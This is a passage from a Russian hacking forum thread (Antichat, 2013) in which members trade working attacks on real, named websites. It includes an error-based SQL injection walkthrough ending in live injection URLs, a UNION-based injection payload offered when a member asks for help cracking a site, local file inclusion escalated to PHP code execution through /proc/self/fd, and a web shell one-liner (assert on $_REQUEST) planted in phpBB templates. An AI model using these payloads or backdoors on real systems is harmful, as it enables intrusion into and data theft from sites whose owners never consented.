ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
04.01.2013, 19:00
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от GhostW
GhostW said:
А где можно найти подробную инфу по Error-Based и как узнать что нужно использовать данный метод?
П.С. Спасибо за быстрый ответ на прошлый вопрос.
Если научится пользоваться поиском то найдем:
Сообщение от Expl0ited
Expl0ited said:
Вся соль пошла отсюда: http://bugs.mysql.com/bug.php?id=32249
Где товарищ, Domas Mituzas, недоумевает, почему код
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]mysql[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]select count[/COLOR][COLOR="#007700"](*),[/COLOR][COLOR="#0000BB"]floor[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]()*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]x from grouptest1 group by x[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
возвращает, то верный результат, то тот же результат, но в обработчике ошибки:
Проблема в том что group by проверяет выражение несколько раз, а rand() в свою очередь возвращает каждый раз разные значение. Цитата из
мануала
:
Исходя из этого некто Qwazar (
пруф
) решил попробовать конкатацию строк, для получения запрошенных данных в обработчике ошибки:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]select count[/COLOR][COLOR="#007700"](*),[/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]version[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]floor[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]()*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]))[/COLOR][COLOR="#0000BB"]x from users group by x[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]
После нескольких попыток выполнить этот запрос, выводится:
#1062 - Duplicate entry '5.5.80' for key 'group_key'
или
#1062 - Duplicate entry '5.5.81' for key 'group_key'
Дальше для упрощения(укорочения) запроса, concat(version(),floor(rand()*2)) перенеслась в group by и мы получаем:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]select count[/COLOR][COLOR="#007700"](*)[/COLOR][COLOR="#0000BB"]from users group by[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]version[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]floor[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]()*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"])));[/COLOR][/COLOR]
Результат:
#1062 - Duplicate entry '5.5.80' for key 'group_key'
или
#1062 - Duplicate entry '5.5.81' for key 'group_key'
К конструкции floor(rand(0)*2)) пришли исключительно методом тыка (если я конечно не ошибаюсь). И в итоге получился вектор, для вывода информации в ошибке mysql:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]select count[/COLOR][COLOR="#007700"](*)[/COLOR][COLOR="#0000BB"]from users group by[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]version[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]floor[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"])));[/COLOR][/COLOR]
Постоянный результат:
#1062 - Duplicate entry '5.5.81' for key 'group_key'
Для удобства можно избавится от лишнего символа 1 в конце результата, использованием 0x00 - нулевой байт
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]select count[/COLOR][COLOR="#007700"](*)[/COLOR][COLOR="#0000BB"]from users group by[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]version[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]0x00[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]floor[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"])));[/COLOR][/COLOR]
Ну и уже в виде инъекции в запросе это может выглядеть так:
Код:
Code:
bug.php?id=10+and+(select+count(*)+from+table+group+by(concat(version(),0x00,floor(rand(0)*2))))--+
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]SELECT id[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]news FROM content WHERE id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]10[/COLOR][COLOR="#007700"]and ([/COLOR][COLOR="#0000BB"]select count[/COLOR][COLOR="#007700"](*)[/COLOR][COLOR="#0000BB"]from table group by[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]concat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]version[/COLOR][COLOR="#007700"](),[/COLOR][COLOR="#0000BB"]0x00[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]floor[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]rand[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]))))--[/COLOR][/COLOR]
И при условии если существует таблица table, то в ответе будет:
#1062 - Duplicate entry '5.5.8' for key 'group_key'
Живой пример:
Код:
Code:
http://www.forakom.ru/tree/index.php?brand_id=739&model_id=5533&engine_id=1005635+and(select+count(*)+from+tcdViews.v_ext_engines+group+by(concat(version(),0x00,floor(rand(0)*2))))--+
Duplicate entry '5.0.67-log' for key 1
Теперь наглядно?
|
|
|
|
04.01.2013, 19:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от herfleisch
herfleisch said:
Что случилось?
То что во-первых это не LFI, во вторых мозг не должен ограничиваться /proc/self/environ
|
|
|
|
04.01.2013, 19:19
|
|
Участник форума
Регистрация: 07.01.2009
Сообщений: 237
Провел на форуме:
745649
Репутация:
97
|
|
Сообщение от Expl0ited
Expl0ited said:
То что во-первых это не LFI
Что это если не Local File Inclusion?
Этот скрипт используется для подгрузки элементов страницы с помощью JavaScript. Каким еще макаром программист стал бы делать это, кроме как с помощью include() или require()?
Кусок кода с главной страницы ресурса:
Код HTML:
HTML:
loadPOPUP("load.php?index="+index+"&file=lib_current.popup.php", popup_id/*'popup'*/, index);
|
|
|
04.01.2013, 22:09
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
2 herfleisch
Все же LFI. Вот код твоего файлика =)))
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
|
|
|
|
04.01.2013, 22:24
|
|
Участник форума
Регистрация: 07.01.2009
Сообщений: 237
Провел на форуме:
745649
Репутация:
97
|
|
Сообщение от Cennarios
Cennarios said:
Все же LFI.
В том что это LFI у меня сомнений не было, ибо
Сообщение от None
http://teyla.ru/load.php?file=index.php
|
|
|
|
04.01.2013, 23:47
|
|
Guest
Сообщений: n/a
Провел на форуме:
2918
Репутация:
0
|
|
Добрый вечер уважаемые.
Помогите раскрутить
Сообщение от None
http://www.cnbest.ru/?main=premises&sort=FlatTyp1&type=SALEFlats-3
|
|
|
|
05.01.2013, 00:07
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Сообщение от s000r
s000r said:
Добрый вечер уважаемые.
Помогите раскрутить
Код:
Code:
http://www.cnbest.ru/index.php?main=news&id=100116 and 0 union select 1,2,concat_ws(0x3a,user(),database(),version())-- -
|
|
|
|
05.01.2013, 06:45
|
|
Guest
Сообщений: n/a
Провел на форуме:
262707
Репутация:
935
|
|
Сообщение от Cennarios
Cennarios said:
2 herfleisch
Все же LFI. Вот код твоего файлика =)))
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Серьезно, это локальный инклюд. Моя ошибка.
http://teyla.ru/load.php?file=/proc/self/fd/9&xx=phpinfo();
|
|
|
|
05.01.2013, 19:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
46989
Репутация:
20
|
|
Люди, не могу залить шелл через шаблоны, включил Разрешить php в шаблонах: ДА
Вставляю в шаблон faq_body.html такой код:
assert(stripslashes($_REQUEST[x]));
0 Реакции.... Помогите плиз
И вообще когда я удаляю все содержимое шаблона, а потом просматриваю ничего на форуме не изменяется...
phpbb 3.0.10
|
|
|
|
05.01.2013, 19:54
|
|
Guest
Сообщений: n/a
Провел на форуме:
46989
Репутация:
20
|
|
Сообщение от OxoTnik
OxoTnik said:
либо нет прав на редактирования шаблона, либо не тот шаблон редактируешь
Не тот шаблон редактировал, спасибо
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
